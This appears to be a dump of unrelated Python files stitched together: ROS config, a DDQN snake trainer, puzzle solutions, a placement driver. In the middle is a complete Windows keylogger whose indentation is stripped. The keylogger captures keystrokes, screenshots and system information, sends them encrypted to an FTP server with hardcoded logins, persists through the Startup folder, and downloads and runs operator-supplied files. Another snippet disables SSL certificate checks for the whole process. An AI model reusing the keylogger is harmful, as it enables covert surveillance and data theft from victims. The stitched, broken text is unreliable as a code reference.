                # Data rows: cluster label (or "N/A") then region (or "None").
                if spent[0] in sd:
                    spent.append(sd[spent[0]])
                else:
                    spent.append("N/A")
                if spent[0] in rd:
                    spent.append(rd[spent[0]])
                else:
                    spent.append("None")
                i += 1
                print("\t".join(spent),file=outf)
    print("Generating viewable pb.")
    subprocess.check_call("matUtils extract -i " + args.input + " -M clusterswapped.tsv -F cluster,region --write-taxodium cview.pb --title Cluster-Tracker -g " + args.annotation + " -f " + args.reference,shell=True)
    print("Process completed; check website for results.")
if __name__ == "__main__":
    # CLI entry point: parse arguments, then run the full update pipeline.
    cli_args = parse_setup()
    primary_pipeline(cli_args)
|
#
# Generated with StrouhalUserDefinedPropertyBlueprint
from dmt.blueprint import Blueprint
from dmt.dimension import Dimension
from dmt.attribute import Attribute
from dmt.enum_attribute import EnumAttribute
from dmt.blueprint_attribute import BlueprintAttribute
from .strouhalspecificationproperty import StrouhalSpecificationPropertyBlueprint
class StrouhalUserDefinedPropertyBlueprint(StrouhalSpecificationPropertyBlueprint):
    """Blueprint (attribute schema) for the StrouhalUserDefinedProperty type.

    Generated code (see file header) — fix the generator rather than editing
    this file by hand.
    """
    def __init__(self, name="StrouhalUserDefinedProperty", package_path="sima/riflex", description=""):
        # Register name/package/description with the parent blueprint.
        super().__init__(name,package_path,description)
        # Scalar string attributes common to SIMA entities.
        self.attributes.append(Attribute("name","string","",default=""))
        self.attributes.append(Attribute("description","string","",default=""))
        self.attributes.append(Attribute("_id","string","",default=""))
        # Variable-length ("*"-dimensioned) containment collections.
        self.attributes.append(BlueprintAttribute("scriptableValues","sima/sima/ScriptableValue","",True,Dimension("*")))
        self.attributes.append(BlueprintAttribute("reynoldStrouhalProperties","sima/riflex/ReynoldStrouhalNumberItem","",True,Dimension("*")))
'''
Python 2.7 implementation with some additional functionality:
-systeminfo data is uploaded when the file is executed
-all the data uploaded to FTP server is encrypted (keys_retriever.py is used to collect/decrypt the data)
-ability to take screenshot with simple kl.UploadScreenShot()
-auto-downloader so you can use keys_retriever.py to upload some file and it will be executed on the target, keys_retrieve.py allows to set few parameters to it like (persistence/execute/upload results if it's nirsoft application)
-use several ftp accounts in case if 1 is not available (drivehq.com has 25 logins/day limit so that's why there's such function)
-"keep alive" (NOOP) packet is sent each minute to the FTP
'''
import pyHook
import pythoncom
import sys, os
import ftplib, datetime
import threading, time
from Queue import Queue
import io, subprocess
from urllib2 import urlopen
import socket
import win32api
from ctypes import Structure, windll, c_uint, sizeof, byref #needed for GetIdleTime()
from random import randint
from PIL import ImageGrab, Image
import StringIO
class LASTINPUTINFO(Structure): #needed for GetIdleTime()
_fields_ = [
('cbSize', c_uint),
('dwTime', c_uint),
]
xorMap = [235, 235, 126, 240, 203, 237, 81, 160, 9, 37, 204, 43, 190, 31, 76, 98, 53, 200, 222, 172, 184, 172, 157, 214, 128, 194, 175, 119, 254, 25, 25, 193, 109, 190, 240, 162, 184, 184, 114, 117, 57, 63, 167, 61, 104, 86, 146, 85, 114, 205, 0, 73, 162, 188, 129, 22, 67, 26, 80, 50, 190, 7, 91, 15, 56, 127, 226, 61, 172, 204, 76, 72, 40, 154, 65, 85, 8, 223, 211, 178, 149, 106, 57, 204, 236, 147, 54, 246, 59, 90, 43, 148, 9, 50, 253, 74, 143, 201, 48, 252, 236, 236, 139, 30, 124, 44, 21, 245, 179, 53, 85, 243, 230, 21, 49, 7, 239, 153, 46, 9, 1, 119, 105, 25, 71, 139, 75, 58, 43, 229, 88, 234, 226, 201, 1, 69, 16, 71, 97, 32, 195, 197, 215, 37, 219, 81, 243, 202, 181, 177, 193, 98, 179, 92, 180, 72, 219, 176, 115, 173, 16, 212, 118, 24, 204, 18, 123, 155, 197, 254, 226, 208, 80, 120, 46, 222, 152, 213, 68, 33, 153, 62, 192, 162, 16, 225, 110, 81, 65, 156, 212, 31, 26, 178, 195, 23, 141, 241, 48, 180]
def ExceptionHandler(func): #the exe won't popup "Couldn't execute keys script" but will output encrypted exception to e.mm file and "gracefully" exit
def call(*args, **kwargs):
try: return func(*args, **kwargs)
except Exception as e:
#with open("e.mm", "wb") as f:
#f.write(XorText("Exception:\n"+str(e), xorMap)) #it's not a good idea to save it to a file if it's in the startup folder...
print "Handled exception:\n"+str(e)
raise SystemExit
return call
@ExceptionHandler
def GetIdleTime():
lastInputInfo = LASTINPUTINFO()
lastInputInfo.cbSize = sizeof(lastInputInfo)
windll.user32.GetLastInputInfo(byref(lastInputInfo))
millis = windll.kernel32.GetTickCount() - lastInputInfo.dwTime
return millis / 1000.0
@ExceptionHandler
def ProcessCmd(command):
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
r = proc.stdout.read() + proc.stderr.read()
return r[:len(r)-2]
@ExceptionHandler
def XorText(text, xorMap):
xoredText = ""
for i, letter in enumerate(text):
xoredText += chr(ord(text[i]) ^ (xorMap[i%len(xorMap)] ^ (xorMap[(len(text)- 1)%len(xorMap)]))) #chr(ord(letter) ^ xorMap[i%len(xorMap)])
return xoredText
@ExceptionHandler
def FilterKey(k, text):
if len(text) > len(k) and len(text) > 3:
if text[len(text)-len(k):] == k and (len(k) > 1 or any(specialKey == k and specialKey == text[len(text)-1] and specialKey == text[len(text)-2] for specialKey in ["w", "s", "a", "d"])):
return ""
return k
@ExceptionHandler
def GetPublicIP():
return str(urlopen('http://ip.42.pl/raw').read())
@ExceptionHandler
def GetLocalIP():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('10.255.255.255', 0))
IP = s.getsockname()[0]
except: IP = '127.0.0.1'
finally: s.close()
return str(IP)
class Keylogger:
@ExceptionHandler
def __init__(self, **kwargs):
self.debug = kwargs.get("debug", False)
self.postfreq = kwargs.get("postfreq", 20)
self.q = Queue()
self.xorMap = xorMap
self.windowname = ""
self.strbuff = ""
self.secSendFile = time.clock()
self.secKeepConAlive = time.clock()
self.secCheckScreenCaptureRequest = time.clock()
self.secDownloadFile = time.clock()
self.ftpFolderName = "_" + "".join(letter for letter in ProcessCmd("echo %USERNAME%") if letter.isalnum())
@ExceptionHandler
def __del__(self):
try: self.ftp.quit()
except:
try: self.ftp.close()
except: pass
try: self.hookManager.UnhookKeyboard()
except: pass
@ExceptionHandler
def StartKeyCapture(self):
self.hookManager = pyHook.HookManager()
self.hookManager.KeyDown = self.OnKeypressCallback
self.hookManager.HookKeyboard()
pythoncom.PumpMessages()
@ExceptionHandler
def OnKeypressCallback(self, press):
if press.Ascii not in range(32,126):
self.q.put([FilterKey("<"+press.Key+">", self.strbuff), press.WindowName])
else:
self.q.put([FilterKey(chr(press.Ascii), self.strbuff), press.WindowName])
return True
@ExceptionHandler
def CopyItselfToStartup(self):
desired_file = ProcessCmd("echo %USERPROFILE%").replace("\\", "/") + "/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/" + os.path.basename(sys.argv[0])
if not os.path.isfile(desired_file):
with open(os.path.basename(sys.argv[0]), "rb") as base_f, open(desired_file, "wb") as new_f:
new_f.write(base_f.read())
if self.debug: print "Copied itself to startup"
@ExceptionHandler
def FTP_Connect(self, server, port, name_list, pswd_list):
for name, pswd in zip(name_list, pswd_list):
try:
self.ftp = ftplib.FTP()
self.ftp.connect(server, port)
self.ftp.login(name, pswd)
except: continue
directories = []
self.ftp.retrlines('LIST', directories.append)
if not any(self.ftpFolderName in d for d in directories):
self.ftp.mkd(self.ftpFolderName)
if self.debug: print "Connected to the ftp server (" + ", ".join([server, name, pswd]) + ")"
return True
raise ValueError("Couldn't connect to: " + server + " using the following credentials:\n" + "".join(u + " : " + p + "\n" for u,p in zip(name_list, pswd_list)))
@ExceptionHandler
def UploadSystemInfo(self):
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("_" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\_")
self.ftp.storbinary("STOR " + "\\"+ self.ftpFolderName +"\\_\\" + datetime.datetime.now().strftime("%d-%m-%Y___%H-%M") + ".mm", io.BytesIO(XorText(GetPublicIP() +"\n"+ GetLocalIP() + "\n" + ProcessCmd("systeminfo"), xorMap)))
if self.debug: print "Systeminfo uploaded"
@ExceptionHandler
def UploadScreenShot(self, **kwargs):
screenFolder = "vv" if kwargs.get("vidstream") == True else "ii"
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any(screenFolder in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName + "\\" + screenFolder)
ss_pil = ImageGrab.grab()
imgBuff = StringIO.StringIO()
ss_pil.save(imgBuff, "JPEG")
self.ftp.storbinary("STOR " + "\\"+ self.ftpFolderName + "\\" + screenFolder + "\\" + datetime.datetime.now().strftime("%d-%m-%Y___%H-%M") + ".mm", io.BytesIO(XorText(imgBuff.getvalue(), xorMap)))
imgBuff.close()
if self.debug: print "ScreenShot uploaded (\\" + screenFolder +")"
@ExceptionHandler
def IsScreenCaptureStreamRequested(self, **kwargs): #not developed it much, it requires more work to be done to be fully functional
if kwargs.get("dircheck", False) == True:
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("vv" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\vv")
return False
if any(f.startswith("s") for f in self.ftp.nlst("\\"+self.ftpFolderName+"\\vv")):
return True
return False
@ExceptionHandler
def IsFileDownloadAvailable(self):
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("f" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\f")
if "f.mm" in self.ftp.nlst("\\"+self.ftpFolderName+"\\f"):
return True
return False
@ExceptionHandler
def DownloadFile(self):
if self.debug: print "DownloadFile"
dataChunks = []
if self.debug: print "0"
self.ftp.retrbinary('RETR ' + "\\"+ self.ftpFolderName +"\\f\\f.mm", dataChunks.append)
if self.debug: print 1
fileInfo, fileData = XorText("".join(dataChunks), self.xorMap).split("###########################_____________________###############################")
if self.debug: print 2
destinationFileName = [v.split("=")[1] for v in fileInfo.split("\n") if "destinationFileName" in v][0]
destinationPath = [v.split("=")[1] for v in fileInfo.split("\n") if "destinationPath" in v][0]
destinationPath = (ProcessCmd("echo %USERPROFILE%").replace("\\", "/") + "/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/") if destinationPath == "startup" else (ProcessCmd("echo %USERPROFILE%").replace("\\", "/") + "/" + destinationPath)
execute = True if [v.split("=")[1] for v in fileInfo.split("\n") if "execute" in v][0] == "True" else False
params = [v.split("=")[1] for v in fileInfo.split("\n") if "params" in v][0]
isNirsoft = True if [v.split("=")[1] for v in fileInfo.split("\n") if "nirsoft" in v][0] == "True" else False
desiredFile = destinationPath + destinationFileName
if not os.path.exists(destinationPath):
os.makedirs(destinationPath)
if os.path.isfile(desiredFile):
os.remove(desiredFile)
with open(desiredFile, "wb") as f:
f.write(fileData)
if self.debug: print "Downloaded "+ destinationFileName
if execute:
ProcessCmd("start \"\" \""+ desiredFile + "\"" + (" "+params if params != "none" else ""))
if self.debug: print "Executed "+ destinationFileName
if isNirsoft:
nsOutput = destinationFileName.split(".")[0] + ".mm"
for i in range(100):
time.sleep(0.1)
if os.path.isfile(nsOutput):
break
else:
if self.debug: print "Nirsoft output not available"
os.remove(desiredFile)
return
with open(nsOutput, "rb") as f:
data = XorText(f.read(),self.xorMap)
os.remove(nsOutput)
os.remove(desiredFile)
if self.debug: print "Nirsoft application and output files removed"
self.UploadNirsoftData(data, nsOutput)
self.ftp.delete("\\"+ self.ftpFolderName +"\\f\\f.mm")
if self.debug: print "Deleted "+ destinationFileName + " from ftp server"
@ExceptionHandler
def UploadNirsoftData(self, data, fileName):
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("n" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\n")
self.ftp.storbinary("STOR " + "\\"+ self.ftpFolderName +"\\n\\" + datetime.datetime.now().strftime("%d-%m-%Y___%H-%M") + ".mm", io.BytesIO(data))
if self.debug: print "Nirsoft data uploaded"
@ExceptionHandler
def Update(self):
try:data = self.q.get(block=False)
except:data = ["",self.windowname]
if data[1] != self.windowname:
self.windowname = data[1]
self.strbuff += "\n\n["+self.windowname+"]\n"
#print "secSendFile=" + str(self.secSendFile) + ", time.clock()=" + str(time.clock())
#print data[0]
self.strbuff += data[0]
if (time.clock() - self.secKeepConAlive) > 60: #every 1 min
self.secKeepConAlive = time.clock()
if self.debug: print "Keep connection alive is going to be sent."
self.ftp.voidcmd("NOOP")
if self.debug: print "Keep connection alive has been sent."
if (time.clock() - self.secSendFile) > self.postfreq*60 and self.strbuff:
self.secSendFile = time.clock()
if self.debug: print "To be uploaded: " + self.strbuff + "\n"
if self.debug: print "To be uploaded (xored): " + XorText(self.strbuff, self.xorMap) + "\n\n"
b = io.BytesIO(XorText(self.strbuff, self.xorMap))
self.ftp.storbinary("STOR " + "\\"+ self.ftpFolderName +"\\" + datetime.datetime.now().strftime("%d-%m-%Y___%H-%M") + ".mm", b)
self.strbuff = ""
#if (time.clock() - self.secCheckScreenCaptureRequest) > 15: #every 15 sec
#if self.IsScreenCaptureStreamRequested(dircheck = True):
#self.UploadScreenShot(vidstream=True)
if (time.clock() - self.secDownloadFile) > 15: #every 15 sec
if self.IsFileDownloadAvailable():
time.sleep(15)
self.DownloadFile()
def QuickSetup(**kwargs):
kl = Keylogger(postfreq=kwargs.get("postfreq", 20), debug=kwargs.get("debug", False))
if kwargs.get("persistence", False): kl.CopyItselfToStartup()
kl.FTP_Connect(kwargs.get("server", "ftp.drivehq.com"),
kwargs.get("port", 0),
kwargs.get("names",["michal", "monday", "thirdAccountUsername"]),
kwargs.get("passwords",["qwerty", "password2", "thirdAccountPssword"]))
kl.UploadSystemInfo()
kl.UploadScreenShot()
keyCapture = threading.Thread(target=kl.StartKeyCapture)
keyCapture.daemon = True
keyCapture.start()
while True:
kl.Update()#a.k.a. run()
time.sleep(0.02)
if __name__ == "__main__":
QuickSetup(postfreq=10, debug = True, persistence=False) |
from urllib import request
import ssl
# Disable SSL certificate verification globally.
# NOTE(review): this turns off certificate checking for *every* HTTPS request
# made by this process, exposing it to man-in-the-middle attacks; prefer a
# properly configured certificate store or a per-request context instead.
ssl._create_default_https_context = ssl._create_unverified_context
if __name__ == "__main__":
    # Plain GET request (urlopen's default when no data is supplied).
    # BUG FIX: urlopen() requires an absolute URL including the scheme;
    # the bare "www...." form raises ValueError("unknown url type").
    url = ("http://www.ebiddingtest.cecep.cn/jyxx/001001/001001001/"
           "20200119/0cac7331-8385-48b7-b252-f836f329aa65.html")
    res = request.urlopen(url)
    print(res)
    # HTTP status code
    print(res.code)
    # Body is bytes; this site serves GBK-encoded HTML
    print(res.read().decode("GBK"))
    # Introspect the available methods/attributes of the response object
    print(dir(res))
|
# -*- coding: utf-8 -*-
from optimus.i18n.manager import I18NManager
def po_interface(settings, init=False, update=False, compile_opt=False):
    """Drive catalog maintenance for every registered language.

    All modes may be enabled at once; they always run in the fixed order
    "init", then "update", then "compile".

    Arguments:
        settings (optimus.conf.model.SettingsModel): Settings object defining
            the locale directory and the template sources to scan.

    Keyword Arguments:
        init (boolean): Initialize the POT file and the "locale" directory.
        update (boolean): Refresh the POT file and PO files for template changes.
        compile_opt (boolean): Compile MO files from PO files.
    """
    manager = I18NManager(settings)

    # Nothing requested: nothing to do.
    if not (init or update or compile_opt):
        return

    # Shared groundwork for every mode.
    manager.init_locales_dir()
    manager.build_pot(force=update)
    manager.init_catalogs()

    if update:
        manager.update_catalogs()
    if compile_opt:
        manager.compile_catalogs()
|
from handy import *
lines = read(20)  # puzzle input — presumably AoC day 20 ("Trench Map"); confirm
#lines = read_test(20)
# First line: the image-enhancement algorithm string; lines[2:]: the initial
# image grid (line index 1 is assumed to be a blank separator).
alg = lines[0]
img = lines[2:]
img_h = len(img)
img_w = len(img[0])
def expand_img(char="."):
    """Grow the global image by a one-cell border of `char` on all four sides."""
    global img
    global img_h, img_w
    bordered = [char + row + char for row in img]
    img_w += 2
    pad_row = char * img_w
    img = [pad_row] + bordered + [pad_row]
    img_h += 2
def pmap(img, r, c):
    """Return the algorithm output pixel for the 3x3 window centred at (r, c)."""
    window = (img[r - 1][c - 1:c + 2]
              + img[r][c - 1:c + 2]
              + img[r + 1][c - 1:c + 2])
    # '.'/'#' window read as a 9-bit binary index into the algorithm string.
    index = int(window.replace('.', '0').replace('#', '1'), base=2)
    return alg[index]
# flip tracks the alternating state of the infinite background between
# enhancement passes — presumably needed because alg[0] == '#' makes the
# background toggle each pass; confirm against the actual puzzle input.
flip = True
print('\n'.join(img))
def enhance():
    """Apply one enhancement pass to the global image in place and print it."""
    global img, img_h, img_w, flip
    border = '.' if flip else '#'
    # Triple padding so every pixel of the (once-grown) output image has a
    # full 3x3 neighbourhood to sample from.
    for _ in range(3):
        expand_img(border)
    flip = not flip
    grid = [list(row) for row in img]
    for row in range(1, img_h - 1):
        for col in range(1, img_w - 1):
            grid[row][col] = pmap(img, row, col)
    # print("\n".join(["".join(z) for z in grid]))
    # Trim one padding layer back off each side.
    img = ["".join(row[1:-1]) for row in grid[1:-1]]
    img_w -= 2
    img_h -= 2
    print("\n".join(img))
|
# https://www.hackerrank.com/challenges/minimum-operations/problem
def min_operations(red, green, blue):
    """Return the minimum removal cost to separate the three colours, or -1.

    dp[i][mask] is the cheapest cost after deciding the first i piles, where
    mask records which colours have been "kept" so far (bit 1 = red,
    bit 2 = green, bit 4 = blue); keeping one colour in a pile costs the
    count of the other two colours in that pile.
    """
    INF = 1 << 30
    n = len(red)
    dp = [[INF] * 8 for _ in range(n + 1)]
    dp[0][0] = 0
    for i, (r, g, b) in enumerate(zip(red, green, blue)):
        cur, nxt = dp[i], dp[i + 1]
        for mask in range(8):
            base = cur[mask]
            if nxt[mask | 1] > base + g + b:
                nxt[mask | 1] = base + g + b
            if nxt[mask | 2] > base + r + b:
                nxt[mask | 2] = base + r + b
            if nxt[mask | 4] > base + r + g:
                nxt[mask | 4] = base + r + g
    # Target mask: every colour that appears anywhere must have been kept.
    target = 0
    for r, g, b in zip(red, green, blue):
        if r:
            target |= 1
        if g:
            target |= 2
        if b:
            target |= 4
    answer = dp[n][target]
    return -1 if answer >= INF else answer
# Read the input in HackerRank format: the pile count n, then one
# "r g b" triple per line.
n = int(input())
red = []
green = []
blue = []
for i in range(n):
    r, g, b = map(int, input().split())
    red.append(r)
    green.append(g)
    blue.append(b)
print(min_operations(red, green, blue))
# generated from genmsg/cmake/pkg-genmsg.context.in
# Build context for the geometry_msgs message package, consumed by the
# gencpp/genlisp/genpy message generators.

# BUG FIX: the original single-line messages_str literal was corrupted by a
# line wrap in the middle of "Vector3.msg" (a syntax error). All .msg files
# live in one directory, so rebuild the identical semicolon-separated string
# from the message names.
_MSG_DIR = "/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg"
_MSG_NAMES = [
    "Accel", "AccelStamped", "AccelWithCovariance", "AccelWithCovarianceStamped",
    "Inertia", "InertiaStamped", "Point", "Point32", "PointStamped",
    "Polygon", "PolygonStamped", "Pose2D", "Pose", "PoseArray", "PoseStamped",
    "PoseWithCovariance", "PoseWithCovarianceStamped", "Quaternion",
    "QuaternionStamped", "Transform", "TransformStamped", "Twist",
    "TwistStamped", "TwistWithCovariance", "TwistWithCovarianceStamped",
    "Vector3", "Vector3Stamped", "Wrench", "WrenchStamped",
]
messages_str = ";".join(_MSG_DIR + "/" + name + ".msg" for name in _MSG_NAMES)
services_str = ""
pkg_name = "geometry_msgs"
dependencies_str = "std_msgs"
langs = "gencpp;genlisp;genpy"
dep_include_paths_str = "geometry_msgs;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg;std_msgs;/usr/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python3"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/usr/lib/genmsg/genmsg_check_deps.py"
|
from game.models.base_game_model import BaseGameModel
from tf_models.ddqn_model import DDQNModel
from game.helpers.constants import Constants
from game.environment.action import Action
import random
import shutil
import numpy as np
import os
from statistics import mean
# Discount factor for future rewards in the Q-learning target.
GAMMA = 0.99
# Maximum number of transitions kept in the replay buffer.
MEMORY_SIZE = 10000
# Minibatch size sampled from replay memory per training step.
BATCH_SIZE = 32
# Environment steps collected before training begins.
# NOTE(review): this exceeds MEMORY_SIZE, so the buffer is already full (and
# the oldest transitions discarded) before the first update — confirm intended.
REPLAY_START_SIZE = 50000
# Train the online network every N environment steps.
TRAINING_FREQUENCY = 4
# Sync the target network every N steps (= every 1000 training updates).
TARGET_NETWORK_UPDATE_FREQUENCY = TRAINING_FREQUENCY*1000
# Persist weights to disk every N steps.
MODEL_PERSISTENCE_UPDATE_FREQUENCY = 10000
# Log the mean score every N finished episodes.
SCORE_LOGGING_FREQUENCY = 100
# Log loss/accuracy/Q metrics every N steps.
LEARNING_LOGGING_FREQUENCY = 10000
# Epsilon-greedy schedule: linear decay from MAX to MIN over EXPLORATION_STEPS.
EXPLORATION_MAX = 1.0
EXPLORATION_MIN = 0.1
# Fixed exploration rate intended for evaluation runs.
EXPLORATION_TEST = 0.01
EXPLORATION_STEPS = 850000
EXPLORATION_DECAY = (EXPLORATION_MAX-EXPLORATION_MIN)/EXPLORATION_STEPS
class BaseDDQNGameModel(BaseGameModel):
    """Shared base for the DDQN player/trainer: sets up the weights path,
    the online network, and weight (de)serialization."""

    # Directory where DDQN weights are persisted.
    model_dir_path = Constants.MODEL_DIRECTORY + "ddqn/"
    # Network input shape: (stacked frames, env width, env height).
    model_input_shape = (int(Constants.FRAMES_TO_REMEMBER), int(Constants.ENV_WIDTH), int(Constants.ENV_HEIGHT))

    def __init__(self, long_name, short_name, abbreviation):
        BaseGameModel.__init__(self, long_name, short_name, abbreviation)
        self.model_path = self.model_dir_path + Constants.DQN_MODEL_NAME
        # NOTE(review): the directory is wiped on every construction, so the
        # _load_model() call below can never find an existing weights file —
        # confirm whether discarding saved weights here is intentional.
        if os.path.exists(os.path.dirname(self.model_path)):
            shutil.rmtree(os.path.dirname(self.model_path), ignore_errors=True)
        os.makedirs(os.path.dirname(self.model_path))
        self.action_space = len(Action.possible())
        self.ddqn = DDQNModel(self.model_input_shape, self.action_space).model
        self._load_model()

    def move(self, environment):
        # Delegates to the base implementation; subclasses extend this.
        BaseGameModel.move(self, environment)

    def _save_model(self):
        # Persist online-network weights to model_path.
        self.ddqn.save_weights(self.model_path)

    def _load_model(self):
        # Restore weights if a checkpoint file exists at model_path.
        if os.path.isfile(self.model_path):
            self.ddqn.load_weights(self.model_path)
class DDQNSolver(BaseDDQNGameModel):
    """Plays using the trained online network with a fixed 1% random-action rate."""

    def __init__(self):
        BaseDDQNGameModel.__init__(self, "Double DQN", "double_dqn", "ddqn")

    def move(self, environment):
        """Return the next action: 1% exploration, otherwise argmax over Q-values."""
        BaseDDQNGameModel.move(self, environment)
        if np.random.rand() < 0.01:
            # BUG FIX: randrange() yields a raw action *index*; it must be
            # mapped through Action.action_from_vector() exactly like the
            # greedy branch (and like DDQNTrainer._ddqn), so that
            # normalized_action() receives an action, not an int.
            action_vector = Action.action_from_vector(random.randrange(self.action_space))
        else:
            state = environment.state()
            q_values = self.ddqn.predict(np.expand_dims(np.asarray(state).astype(np.float64), axis=0), batch_size=1)
            action_vector = Action.action_from_vector(np.argmax(q_values[0]))
        return Action.normalized_action(environment.snake_action, action_vector)
class DDQNTrainer(BaseDDQNGameModel):
    """Trains a double-DQN: an online network updated from replay memory and
    a target network synced periodically for stable Q-targets."""

    def __init__(self):
        BaseDDQNGameModel.__init__(self, "Double DQN", "double_dqn_trainer", "ddqnt")
        # Separate target network; synced in _reset_target_network().
        self.ddqn_target = DDQNModel(self.model_input_shape, self.action_space).model
        # Replay buffer of transition dicts, capped at MEMORY_SIZE.
        self.memory = []
        self.epsilon = EXPLORATION_MAX

    def move(self, environment):
        BaseDDQNGameModel.move(self, environment)
        self._ddqn()

    def _ddqn(self, total_step_limit=10000000, total_run_limit=None, clip=True):
        """Main training loop: play episodes, store transitions, train.

        Args:
            total_step_limit: hard cap on environment steps before exiting.
            total_run_limit: optional cap on episodes before exiting.
            clip: when True, rewards are clipped to their sign (-1/0/+1).
        """
        run = 0
        total_step = 0
        scores = []
        while True:
            if total_run_limit is not None and run >= total_run_limit:
                print ("Reached total run limit of: " + str(total_run_limit))
                exit(0)
            run += 1
            env = self.prepare_training_environment()
            current_state = env.state()
            step = 0
            score = env.reward()
            while True:
                if total_step >= total_step_limit:
                    print ("Reached total step limit of: " + str(total_step_limit))
                    exit(0)
                total_step += 1
                step += 1
                action = self._predict_move(current_state)
                action_vector = Action.action_from_vector(action)
                normalized_action = Action.normalized_action(env.snake_action, action_vector)
                next_state, reward, terminal = env.full_step(normalized_action)
                if clip:
                    # BUG FIX: the original computed np.sign(reward) and
                    # discarded the result, so rewards were never clipped.
                    reward = np.sign(reward)
                score += reward
                self._remember(current_state, action, reward, next_state, terminal)
                current_state = next_state
                self._step_update(total_step)
                if terminal:
                    scores.append(score)
                    if len(scores) % SCORE_LOGGING_FREQUENCY == 0:
                        self.log_score(mean(scores))
                        print('{{"metric": "score", "value": {}}}'.format(mean(scores)))
                        print('{{"metric": "run", "value": {}}}'.format(run))
                        scores = []
                    break

    def _predict_move(self, state):
        """Epsilon-greedy action index; purely random until replay warm-up."""
        if np.random.rand() < self.epsilon or len(self.memory) < REPLAY_START_SIZE:
            return random.randrange(self.action_space)
        q_values = self.ddqn.predict(np.expand_dims(np.asarray(state).astype(np.float64), axis=0), batch_size=1)
        return np.argmax(q_values[0])

    def _remember(self, current_state, action, reward, next_state, terminal):
        """Append one transition to replay memory, evicting the oldest if full."""
        self.memory.append({"current_state": np.asarray(current_state),
                            "action": action,
                            "reward": reward,
                            "next_state": np.asarray(next_state),
                            "terminal": terminal})
        if len(self.memory) > MEMORY_SIZE:
            self.memory.pop(0)

    def _step_update(self, total_step):
        """Run the periodic training / logging / persistence / sync schedule."""
        if total_step < REPLAY_START_SIZE:
            return
        if total_step % TRAINING_FREQUENCY == 0:
            loss, accuracy, average_max_q = self._train()
            if total_step % LEARNING_LOGGING_FREQUENCY == 0:
                #TODO: batch and average these values
                print('{{"metric": "loss", "value": {}}}'.format(loss))
                print('{{"metric": "accuracy", "value": {}}}'.format(accuracy))
                print('{{"metric": "q", "value": {}}}'.format(average_max_q))
        self._update_epsilon()
        if total_step % MODEL_PERSISTENCE_UPDATE_FREQUENCY == 0:
            print('{{"metric": "epsilon", "value": {}}}'.format(self.epsilon))
            print('{{"metric": "total_step", "value": {}}}'.format(total_step))
            self._save_model()
        if total_step % TARGET_NETWORK_UPDATE_FREQUENCY == 0:
            self._reset_target_network()

    def _train(self):
        """Fit the online network on one replay minibatch; returns
        (loss, accuracy, mean max-Q)."""
        # BUG FIX: guard *before* sampling — random.sample() raises ValueError
        # when the population is smaller than the sample size, so the original
        # post-sample length check could never trigger. (Unreachable in
        # practice given the REPLAY_START_SIZE gate, but correct now.)
        if len(self.memory) < BATCH_SIZE:
            return
        batch = random.sample(self.memory, BATCH_SIZE)
        current_states = []
        q_values = []
        max_q_values = []
        for entry in batch:
            current_state = np.expand_dims(np.asarray(entry["current_state"]).astype(np.float64), axis=0)
            current_states.append(current_state)
            next_state = np.expand_dims(np.asarray(entry["next_state"]).astype(np.float64), axis=0)
            # Q-target from the *target* network for stability.
            next_state_prediction = self.ddqn_target.predict(next_state).ravel()
            next_q_value = np.max(next_state_prediction)
            q = list(self.ddqn.predict(current_state)[0])
            if entry["terminal"]:
                q[entry["action"]] = entry["reward"]
            else:
                q[entry["action"]] = entry["reward"] + GAMMA * next_q_value
            q_values.append(q)
            max_q_values.append(np.max(q))
        fit = self.ddqn.fit(np.asarray(current_states).squeeze(),
                            np.asarray(q_values).squeeze(),
                            batch_size=BATCH_SIZE,
                            verbose=0)
        loss = fit.history["loss"][0]
        # NOTE(review): assumes the model was compiled with an "accuracy"
        # metric under that exact key — confirm against DDQNModel.
        accuracy = fit.history["accuracy"][0]
        return loss, accuracy, mean(max_q_values)

    def _update_epsilon(self):
        # Linear decay, floored at EXPLORATION_MIN.
        self.epsilon -= EXPLORATION_DECAY
        self.epsilon = max(EXPLORATION_MIN, self.epsilon)

    def _reset_target_network(self):
        # Copy online-network weights into the target network.
        self.ddqn_target.set_weights(self.ddqn.get_weights())
|
##
# @file Placer.py
# @author Yibo Lin
# @date Apr 2018
# @brief Main file to run the entire placement flow.
#
import matplotlib
matplotlib.use('Agg')
import os
import sys
import time
import numpy as np
import Params
import PlaceDB
import NonLinearPlace
import pdb
def place(params):
    """
    @brief Top API to run the entire placement flow: read the database, run
           global (non-linear) placement, write the .gp.pl solution, then
           optionally invoke an external detailed placer and plot.
    @param params parameters (Params.Params instance)
    """
    np.random.seed(params.random_seed)
    # read database
    tt = time.time()
    placedb = PlaceDB.PlaceDB()
    placedb(params)
    print("[I] reading database takes %.2f seconds" % (time.time()-tt))
    #placedb.write_nets(params, "tmp.nets")
    # solve placement
    tt = time.time()
    placer = NonLinearPlace.NonLinearPlace(params, placedb)
    print("[I] non-linear placement initialization takes %.2f seconds" % (time.time()-tt))
    metrics = placer(params, placedb)
    print("[I] non-linear placement takes %.2f seconds" % (time.time()-tt))
    # write placement solution
    path = "%s/%s" % (params.result_dir, os.path.splitext(os.path.basename(params.aux_file))[0])
    if not os.path.exists(path):
        os.system("mkdir -p %s" % (path))
    gp_out_file = os.path.join(path, os.path.basename(params.aux_file).replace(".aux", ".gp.pl"))
    placedb.write_pl(params, gp_out_file)
    # call external detailed placement
    if params.detailed_place_engine and os.path.exists(params.detailed_place_engine):
